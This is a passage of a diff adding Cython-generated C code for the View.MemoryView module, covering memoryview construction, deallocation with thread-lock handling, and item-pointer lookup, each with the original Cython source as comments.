__pyx_state): + * __pyx_unpickle_Enum__set_state(self, __pyx_state) # <<<<<<<<<<<<<< + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(1, 17, __pyx_L1_error) + __pyx_t_1 = __pyx_unpickle_Enum__set_state(__pyx_v_self, ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 17, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":16 + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state(self, __pyx_state) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.Enum.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":349 + * cdef __Pyx_TypeInfo *typeinfo + * + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): # <<<<<<<<<<<<<< + * self.obj = obj + * self.flags = flags + */ + +/* Python wrapper */ +static int __pyx_memoryview___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_memoryview___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_obj = 0; + int __pyx_v_flags; + int __pyx_v_dtype_is_object; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_obj,&__pyx_n_s_flags,&__pyx_n_s_dtype_is_object,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_obj)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_flags)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 2, 3, 1); __PYX_ERR(1, 349, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dtype_is_object); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(1, 349, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_obj = values[0]; + __pyx_v_flags = __Pyx_PyInt_As_int(values[1]); if (unlikely((__pyx_v_flags == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + if (values[2]) { + __pyx_v_dtype_is_object = __Pyx_PyObject_IsTrue(values[2]); if (unlikely((__pyx_v_dtype_is_object == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + } else { + __pyx_v_dtype_is_object = ((int)0); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 2, 3, __pyx_nargs); __PYX_ERR(1, 349, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview___cinit__(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v_obj, __pyx_v_flags, __pyx_v_dtype_is_object); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview___cinit__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj, int __pyx_v_flags, int __pyx_v_dtype_is_object) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + Py_intptr_t __pyx_t_4; + size_t __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* "View.MemoryView":350 + * + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): + * self.obj = obj # <<<<<<<<<<<<<< + * self.flags = flags + * if type(self) is memoryview or obj is not None: + */ + __Pyx_INCREF(__pyx_v_obj); + __Pyx_GIVEREF(__pyx_v_obj); + __Pyx_GOTREF(__pyx_v_self->obj); + __Pyx_DECREF(__pyx_v_self->obj); + __pyx_v_self->obj = __pyx_v_obj; + + /* "View.MemoryView":351 + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): + * self.obj = obj + * self.flags = flags # <<<<<<<<<<<<<< + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) + */ + __pyx_v_self->flags = __pyx_v_flags; + + /* "View.MemoryView":352 + * self.obj = obj + * self.flags = flags + * if type(self) is memoryview or obj is not None: # <<<<<<<<<<<<<< + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: + */ + __pyx_t_2 = (((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self))) == ((PyObject *)__pyx_memoryview_type)); + if (!__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_2 = (__pyx_v_obj != Py_None); + __pyx_t_1 = __pyx_t_2; + __pyx_L4_bool_binop_done:; + if (__pyx_t_1) { + + /* "View.MemoryView":353 + * self.flags = flags + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) # <<<<<<<<<<<<<< + * if self.view.obj == NULL: + * (<__pyx_buffer *> &self.view).obj = Py_None + */ + __pyx_t_3 = __Pyx_GetBuffer(__pyx_v_obj, (&__pyx_v_self->view), __pyx_v_flags); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 353, __pyx_L1_error) + + /* "View.MemoryView":354 + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: # <<<<<<<<<<<<<< + * (<__pyx_buffer *> &self.view).obj = Py_None + * Py_INCREF(Py_None) + */ + __pyx_t_1 = (((PyObject *)__pyx_v_self->view.obj) == NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":355 + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: + * (<__pyx_buffer *> &self.view).obj = Py_None # <<<<<<<<<<<<<< + * Py_INCREF(Py_None) + * + */ + ((Py_buffer *)(&__pyx_v_self->view))->obj = Py_None; + + /* "View.MemoryView":356 + * if self.view.obj == NULL: + * (<__pyx_buffer *> &self.view).obj = Py_None + * Py_INCREF(Py_None) # <<<<<<<<<<<<<< + * + * if not __PYX_CYTHON_ATOMICS_ENABLED(): + */ + Py_INCREF(Py_None); + + /* "View.MemoryView":354 + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: # <<<<<<<<<<<<<< + * (<__pyx_buffer *> &self.view).obj = Py_None + * Py_INCREF(Py_None) + */ + } + + /* "View.MemoryView":352 + * self.obj = obj + * self.flags = flags + * if type(self) is memoryview or obj is not None: # <<<<<<<<<<<<<< + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: + */ + } + + /* "View.MemoryView":358 + * Py_INCREF(Py_None) + * + * if not __PYX_CYTHON_ATOMICS_ENABLED(): # <<<<<<<<<<<<<< + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: + */ + __pyx_t_1 = (!__PYX_CYTHON_ATOMICS_ENABLED()); + if (__pyx_t_1) { + + /* "View.MemoryView":360 + * if not __PYX_CYTHON_ATOMICS_ENABLED(): + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: # <<<<<<<<<<<<<< + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + */ + __pyx_t_1 = (__pyx_memoryview_thread_locks_used < 8); + if (__pyx_t_1) { + + /* "View.MemoryView":361 + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: + */ + __pyx_v_self->lock = (__pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used]); + + /* "View.MemoryView":362 + * if __pyx_memoryview_thread_locks_used < 8: + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 # <<<<<<<<<<<<<< + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() + */ + __pyx_memoryview_thread_locks_used = (__pyx_memoryview_thread_locks_used + 1); + + /* "View.MemoryView":360 + * if not __PYX_CYTHON_ATOMICS_ENABLED(): + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: # <<<<<<<<<<<<<< + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + */ + } + + /* "View.MemoryView":363 + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: # <<<<<<<<<<<<<< + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: + */ + __pyx_t_1 = (__pyx_v_self->lock == NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":364 + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() # <<<<<<<<<<<<<< + * if self.lock is NULL: + * raise MemoryError + */ + __pyx_v_self->lock = PyThread_allocate_lock(); + + /* "View.MemoryView":365 + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + __pyx_t_1 = (__pyx_v_self->lock == NULL); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":366 + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: + * raise MemoryError # <<<<<<<<<<<<<< + * + * if flags & PyBUF_FORMAT: + */ + PyErr_NoMemory(); __PYX_ERR(1, 366, __pyx_L1_error) + + /* "View.MemoryView":365 + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + } + + /* "View.MemoryView":363 + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: # <<<<<<<<<<<<<< + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: + */ + } + + /* "View.MemoryView":358 + * Py_INCREF(Py_None) + * + * if not __PYX_CYTHON_ATOMICS_ENABLED(): # <<<<<<<<<<<<<< + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: + */ + } + + /* "View.MemoryView":368 + * raise MemoryError + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_FORMAT) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":369 + * + * if flags & PyBUF_FORMAT: + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') # <<<<<<<<<<<<<< + * else: + * self.dtype_is_object = dtype_is_object + */ + __pyx_t_2 = ((__pyx_v_self->view.format[0]) == 'O'); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L12_bool_binop_done; + } + __pyx_t_2 = ((__pyx_v_self->view.format[1]) == '\x00'); + __pyx_t_1 = __pyx_t_2; + __pyx_L12_bool_binop_done:; + __pyx_v_self->dtype_is_object = __pyx_t_1; + + /* "View.MemoryView":368 + * raise MemoryError + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') + * else: + */ + goto __pyx_L11; + } + + /* "View.MemoryView":371 + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') + * else: + * self.dtype_is_object = dtype_is_object # <<<<<<<<<<<<<< + * + * assert (&self.acquisition_count) % sizeof(__pyx_atomic_int_type) == 0 + */ + /*else*/ { + __pyx_v_self->dtype_is_object = __pyx_v_dtype_is_object; + } + __pyx_L11:; + + /* "View.MemoryView":373 + * self.dtype_is_object = dtype_is_object + * + * assert (&self.acquisition_count) % sizeof(__pyx_atomic_int_type) == 0 # <<<<<<<<<<<<<< + * self.typeinfo = NULL + * + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_4 = ((Py_intptr_t)((void *)(&__pyx_v_self->acquisition_count))); + __pyx_t_5 = (sizeof(__pyx_atomic_int_type)); + if (unlikely(__pyx_t_5 == 0)) { + PyErr_SetString(PyExc_ZeroDivisionError, "integer division or modulo by zero"); + __PYX_ERR(1, 373, __pyx_L1_error) + } + __pyx_t_1 = ((__pyx_t_4 % __pyx_t_5) == 0); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(1, 373, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(1, 373, __pyx_L1_error) + #endif + + /* "View.MemoryView":374 + * + * assert (&self.acquisition_count) % sizeof(__pyx_atomic_int_type) == 0 + * self.typeinfo = NULL # <<<<<<<<<<<<<< + * + * def __dealloc__(memoryview self): + */ + __pyx_v_self->typeinfo = NULL; + + /* "View.MemoryView":349 + * cdef __Pyx_TypeInfo *typeinfo + * + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): # <<<<<<<<<<<<<< + * self.obj = obj + * self.flags = flags + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":376 + * self.typeinfo = NULL + * + * def __dealloc__(memoryview self): # <<<<<<<<<<<<<< + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + */ + +/* Python wrapper */ +static void __pyx_memoryview___dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_memoryview___dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_2__dealloc__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_2__dealloc__(struct __pyx_memoryview_obj *__pyx_v_self) { + int __pyx_v_i; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + PyThread_type_lock __pyx_t_5; + PyThread_type_lock __pyx_t_6; + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "View.MemoryView":377 + * + * def __dealloc__(memoryview self): + * if self.obj is not None: # <<<<<<<<<<<<<< + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + */ + __pyx_t_1 = (__pyx_v_self->obj != Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":378 + * def __dealloc__(memoryview self): + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) # <<<<<<<<<<<<<< + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + * + */ + __Pyx_ReleaseBuffer((&__pyx_v_self->view)); + + /* "View.MemoryView":377 + * + * def __dealloc__(memoryview self): + * if self.obj is not None: # <<<<<<<<<<<<<< + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":379 + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: # <<<<<<<<<<<<<< + * + * (<__pyx_buffer *> &self.view).obj = NULL + */ + __pyx_t_1 = (((Py_buffer *)(&__pyx_v_self->view))->obj == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":381 + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + * + * (<__pyx_buffer *> &self.view).obj = NULL # <<<<<<<<<<<<<< + * Py_DECREF(Py_None) + * + */ + ((Py_buffer *)(&__pyx_v_self->view))->obj = NULL; + + /* "View.MemoryView":382 + * + * (<__pyx_buffer *> &self.view).obj = NULL + * Py_DECREF(Py_None) # <<<<<<<<<<<<<< + * + * cdef int i + */ + Py_DECREF(Py_None); + + /* "View.MemoryView":379 + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: # <<<<<<<<<<<<<< + * + * (<__pyx_buffer *> &self.view).obj = NULL + */ + } + __pyx_L3:; + + /* "View.MemoryView":386 + * cdef int i + * global __pyx_memoryview_thread_locks_used + * if self.lock != NULL: # <<<<<<<<<<<<<< + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: + */ + __pyx_t_1 = (__pyx_v_self->lock != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":387 + * global __pyx_memoryview_thread_locks_used + * if self.lock != NULL: + * for i in range(__pyx_memoryview_thread_locks_used): # <<<<<<<<<<<<<< + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 + */ + __pyx_t_2 = __pyx_memoryview_thread_locks_used; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":388 + * if self.lock != NULL: + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: + */ + __pyx_t_1 = ((__pyx_memoryview_thread_locks[__pyx_v_i]) == __pyx_v_self->lock); + if (__pyx_t_1) { + + /* "View.MemoryView":389 + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 # <<<<<<<<<<<<<< + * if i != __pyx_memoryview_thread_locks_used: + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + */ + __pyx_memoryview_thread_locks_used = (__pyx_memoryview_thread_locks_used - 1); + + /* "View.MemoryView":390 + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + */ + __pyx_t_1 = (__pyx_v_i != __pyx_memoryview_thread_locks_used); + if (__pyx_t_1) { + + /* "View.MemoryView":392 + * if i != __pyx_memoryview_thread_locks_used: + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) # <<<<<<<<<<<<<< + * break + * else: + */ + __pyx_t_5 = (__pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used]); + __pyx_t_6 = (__pyx_memoryview_thread_locks[__pyx_v_i]); + + /* "View.MemoryView":391 + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + * break + */ + (__pyx_memoryview_thread_locks[__pyx_v_i]) = __pyx_t_5; + (__pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used]) = __pyx_t_6; + + /* "View.MemoryView":390 + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + */ + } + + /* "View.MemoryView":393 + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + * break # <<<<<<<<<<<<<< + * else: + * PyThread_free_lock(self.lock) + */ + goto __pyx_L6_break; + + /* "View.MemoryView":388 + * if self.lock != NULL: + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: + */ + } + } + /*else*/ { + + /* "View.MemoryView":395 + * break + * else: + * PyThread_free_lock(self.lock) # <<<<<<<<<<<<<< + * + * cdef char *get_item_pointer(memoryview self, object index) except NULL: + */ + PyThread_free_lock(__pyx_v_self->lock); + } + __pyx_L6_break:; + + /* "View.MemoryView":386 + * cdef int i + * global __pyx_memoryview_thread_locks_used + * if self.lock != NULL: # <<<<<<<<<<<<<< + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: + */ + } + + /* "View.MemoryView":376 + * self.typeinfo = NULL + * + * def __dealloc__(memoryview self): # <<<<<<<<<<<<<< + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":397 + * PyThread_free_lock(self.lock) + * + * cdef char *get_item_pointer(memoryview self, object index) except NULL: # <<<<<<<<<<<<<< + * cdef Py_ssize_t dim + * cdef char *itemp = self.view.buf + */ + +static char *__pyx_memoryview_get_item_pointer(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index) { + Py_ssize_t __pyx_v_dim; + char *__pyx_v_itemp; + PyObject *__pyx_v_idx = NULL; + char *__pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t __pyx_t_3; + PyObject *(*__pyx_t_4)(PyObject *); + PyObject *__pyx_t_5 = NULL; + Py_ssize_t __pyx_t_6; + char *__pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_item_pointer", 0); + + /* "View.MemoryView":399 + * cdef char *get_item_pointer(memoryview self, object index) except NULL: + * cdef Py_ssize_t dim + * cdef char *itemp = self.view.buf # <<<<<<<<<<<<<< + * + * for dim, idx in enumerate(index): + */ + __pyx_v_itemp = ((char *)__pyx_v_self->view.buf); + + /* "View.MemoryView":401 + * cdef char *itemp = self.view.buf + * + * for dim, idx in enumerate(index): # <<<<<<<<<<<<<< + * itemp = pybuffer_index(&self.view, itemp, idx, dim) + * + */ + __pyx_t_1 = 0; + if (likely(PyList_CheckExact(__pyx_v_index)) || PyTuple_CheckExact(__pyx_v_index)) { + __pyx_t_2 = __pyx_v_index; __Pyx_INCREF(__pyx_t_2); __pyx_t_3 = 0; + __pyx_t_4 = NULL; + } else { + __pyx_t_3 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_v_index); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 401, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_4)) { + if (likely(PyList_CheckExact(__pyx_t_2))) { + if (__pyx_t_3 >= PyList_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_5 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_3); __Pyx_INCREF(__pyx_t_5); __pyx_t_3++; if (unlikely((0 < 0))) __PYX_ERR(1, 401, __pyx_L1_error) + #else + __pyx_t_5 = PySequence_ITEM(__pyx_t_2, __pyx_t_3); __pyx_t_3++; if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + #endif + } else { + if (__pyx_t_3 >= PyTuple_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_5 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_3); __Pyx_INCREF(__pyx_t_5); __pyx_t_3++; if (unlikely((0 < 0))) __PYX_ERR(1, 401, __pyx_L1_error) + #else + __pyx_t_5 = PySequence_ITEM(__pyx_t_2, __pyx_t_3); __pyx_t_3++; if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + #endif + } + } else { + __pyx_t_5 = __pyx_t_4(__pyx_t_2); + if (unlikely(!__pyx_t_5)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 401, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_5); + } + __Pyx_XDECREF_SET(__pyx_v_idx, __pyx_t_5); + __pyx_t_5 = 0; + __pyx_v_dim = __pyx_t_1; + __pyx_t_1 = (__pyx_t_1 + 1); + + /* "View.MemoryView":402 + * + * for dim, idx in enumerate(index): + * itemp = pybuffer_index(&self.view, itemp, idx, dim) # <<<<<<<<<<<<<< + * + * return itemp + */ + __pyx_t_6 = __Pyx_PyIndex_AsSsize_t(__pyx_v_idx); if (unlikely((__pyx_t_6 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 402, __pyx_L1_error) + __pyx_t_7 = __pyx_pybuffer_index((&__pyx_v_self->view), __pyx_v_itemp, __pyx_t_6, __pyx_v_dim); if (unlikely(__pyx_t_7 == ((char *)NULL))) __PYX_ERR(1, 402, __pyx_L1_error) + __pyx_v_itemp = __pyx_t_7; + + /* 